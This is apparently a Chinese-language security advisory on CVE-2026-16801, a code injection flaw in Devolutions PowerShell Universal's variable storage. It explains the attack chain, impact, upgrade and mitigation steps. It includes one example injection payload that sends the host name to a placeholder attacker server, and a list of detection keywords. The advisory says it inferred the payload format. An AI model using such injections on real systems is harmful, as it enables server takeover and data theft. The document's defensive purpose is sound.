🟠 高危 | CVE-2026-16801 — Improper control of generation of code ('Code Inje...
🟠 【深度分析】高危安全漏洞:CVE-2026-16801
CVSS 评分: 高危(8.8)🟠 状态: Analyzed 发布时间: 2026-07-24
🔍 技术细节速览
| 字段 | 值 |
|---|---|
| CVE ID | CVE-2026-16801 |
| CVSS 评分 | 8.8 🟠 |
| 严重程度 | 高危 |
| CVSS 向量 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| CWE 分类 | CWE-94 |
| 发布时间 | 2026-07-24 |
| 最后更新 | 2026-07-29 |
| 状态 | Analyzed |
| 数据来源 | security@devolutions.net |
🔥 危害等级:高危
CVSS 3.1 评分:8.8
攻击向量:远程网络(AV:N) | 攻击复杂度:低(AC:L) | 所需权限:低(PR:L) | 用户交互:无(UI:N)
漏洞概述
CVE-2026-16801 是 Devolutions PowerShell Universal(PSU)产品中存在的代码注入(Code Injection) 漏洞。该漏洞源于产品在将变量(variables)写入配置文件时未对变量值进行充分转义,导致具备变量写入权限的已认证用户可注入并执行任意 PowerShell 代码。
该漏洞影响 PowerShell Universal 2026.2.2 及更早版本,综合考虑攻击链复杂度、所需权限及最终影响,NVD 评定其 CVSS 3.1 基准评分为 8.8(高危)。
由于 PowerShell Universal 常被用作企业 IT 自动化、运维编排和脚本管理平台,持有低权限账户的内部用户或攻击者一旦利用此漏洞,可全面突破平台安全边界,进而威胁底层服务器安全。
受影响组件与版本
| 项目 | 详情 |
|---|---|
| 受影响产品 | Devolutions PowerShell Universal |
| 受影响版本 | ≤ 2026.2.2(含 2026.2.2) |
| 修复版本 | 2026.2.3(或更高版本) |
| 运行环境 | Windows / Linux / macOS(.NET 运行时环境) |
| 前置条件 | 需持有 PowerShell Universal 平台中具备变量写入权限的已认证账户 |
漏洞原理分析
技术背景
PowerShell Universal 提供"变量(Variables)"功能,用于在平台中集中管理可供自动化脚本和作业使用的键值对配置数据。用户可通过 Web 管理界面或 REST API 创建、编辑变量,平台随后将变量数据持久化至配置文件(如 variables.json 或包含脚本化定义的数据文件)中。
漏洞成因
根据 NVD 描述,漏洞在于变量值在写入配置文件时未经过正确的转义(properly escaped)。由于变量的存储文件本质上最终以 PowerShell 脚本 的形式被执行或解析,当变量值中包含特殊字符(如 ;、$()、转义引号等)时,未经过滤的内容将被解释为 PowerShell 代码的一部分,而非纯字符串字面量。
具体而言,攻击者可构造如下形式的变量值:
'; Invoke-WebRequest -Uri http://attacker.example/collect -Method POST -Body $env:COMPUTERNAME; '
当 PowerSU 平台加载或执行该变量时,单引号提前终止了字符串上下文,后续注入的 PowerShell 命令被拼接至合法执行序列中,从而实现任意代码执行。
⚠️ 说明:NVD 当前描述中未明确给出配置文件的具体格式及注入点在文件的精确位置。以上分析基于"未正确转义导致配置文件代码注入"这一描述所做的合理技术推断,确切攻击载荷格式可能因版本及存储机制而有所差异。
攻击链路
低权限用户(具备变量写权限)
│
▼
构造恶意变量值(嵌入 PowerShell 代码)
│
▼
变量被持久化至配置文件(未转义)
│
▼
PSU 调度程序/作业加载配置并解释执行
│
▼
恶意 PowerShell 代码以 PSU 服务账户权限执行
值得注意的是:该漏洞无需用户交互(UI:N) ,攻击者只需通过 API 或 Web 界面提交恶意变量内容,下次配置加载或相关作业触发时即自动触发注入。
影响评估
CVSS 向量深度解析
| 指标 | 取值 | 分析 |
|---|---|---|
| 攻击向量(AV) | N(网络) | 可通过 Web 管理界面或 REST API 远程利用,无需物理或本地访问 |
| 攻击复杂度(AC) | L(低) | 无需特殊条件竞争或复杂环境准备,直接构造恶意输入即可 |
| 所需权限(PR) | L(低) | 仅需具备变量写入权限的普通认证账户,无需管理员权限 |
| 用户交互(UI) | N(无) | 无需诱导其他用户操作,自动化触发 |
| 影响范围(S) | U(不变) | 利用突破的是 PSU 平台自身安全边界,不涉及其他安全域(但对底层 OS 的冲击涵盖在 C/I/A 中) |
| 机密性(C) | H(高) | 可读取服务器文件系统、环境变量、其他变量值(含机密信息) |
| 完整性(I) | H(高) | 可修改或删除服务器上的任意文件与配置 |
| 可用性(A) | H(高) | 可终止进程、删除关键数据或植入持久化后门,导致服务中断 |
实际威胁评估
| 维度 | 评估结果 |
|---|---|
| 利用难度 | ★★☆☆☆(较低)—— 构造恶意变量值无需复杂技术,且无需管理员权限 |
| 攻击前置条件 | 需获得平台中任意具有变量写入权限的账户。在 PSU 多租户/多团队共享场景中,低权限用户通常默认具备该能力 |
| 潜在影响 | 获得 PSU 服务账户同等权限。若 PSU 以高权限账户运行(如 LocalSystem / root),则可直接接管服务器 |
| 检测难度 | 中高——恶意代码隐藏在合法变量配置中,常规 AV/EDR 难以通过静态扫描发现 |
| 横向移动风险 | 高——PSU 通常存储各类服务器凭据和自动化连接信息,攻击者可窃取并用于横向移动 |
受影响业务场景
- 企业自动化运维平台:攻击者可篡改自动化脚本执行逻辑,植入挖矿程序或勒索软件;
- CI/CD 流水线:若 PSU 与软件交付流程集成,注入代码可能污染构建产物或窃取密钥;
- 多租户托管场景:MSP 或 MSSP 客户共享同一 PSU 实例时,租户间隔离可能被突破。
修复建议
1. 升级补丁(首选措施)
| 操作 | 说明 |
|---|---|
| 立即升级 | 将 PowerShell Universal 升级至 2026.2.3 或更高版本,该版本已修复变量值的转义处理逻辑 |
| 验证修复 | 升级后创建包含特殊字符(如 '; code; ')的测试变量,确认其被安全存储且不会被执行 |
同时关注 Devolutions 官方安全公告页,及时获取后续安全更新。
2. 临时缓解措施(升级前)
- 最小化权限原则:立即审计所有 PSU 用户账户,移除非必要用户的"变量写入"权限,仅保留给受信任的管理员;
- 限制网络暴露:通过防火墙/VPN 限制 PSU 管理界面及 API 的访问来源,仅允许受信任管理网段访问,降低攻击面;
- 启用审计日志:开启 PSU 详细审计日志,密切关注变量创建/修改操作的异常行为(如非工作时间、非管理员的变量操作);
- 强化服务账户配置:将 PSU 服务账户从管理员/root 降级为最小权限账户,限制其文件系统写权限及系统命令执行能力,缩小漏洞利用的爆炸半径。
3. 检测与响应
- 日志排查:重点筛查近期创建或修改的变量中是否包含 PowerShell 敏感关键字(如
Invoke-Expression、IEX、DownloadString、Start-Process等); - 文件完整性监控:对 PSU 配置文件目录启用 FIM(文件完整性监控),防止恶意变量配置被持久化后隐匿;
- 威胁狩猎:检查 PSU 服务器近期是否有异常出站网络连接(如连接非标准端口),排查已被植入后门的迹象。
参考资料
| 类型 | 链接 |
|---|---|
| NVD 漏洞详情页 | https://nvd.nist.gov/vuln/detail/CVE-2026-16801 |
| CWE-94 代码注入 | https://cwe.mitre.org/data/definitions/94.html |
| Devolutions 安全公告 | https://devolutions.net/security/advisories/DevPSU-2026-006/ |
| PowerShell Universal 官方文档 | https://docs.powershelluniversal.com/ |
| CVSS 3.1 计算器 | https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
📌 总结:CVE-2026-16801 是一个利用简单、影响深远的代码注入漏洞,攻击者只需低权限账户即可实现对 PSU 服务器的完全控制。所有受影响用户应优先安排升级至 2026.2.3+,并在升级完成前落实权限收敛与网络访问限制等临时缓解措施,确保平台安全。
本报告基于 NVD 公开数据分析生成,部分技术细节为基于已有信息的合理推断,具体利用细节可能因实际环境而异。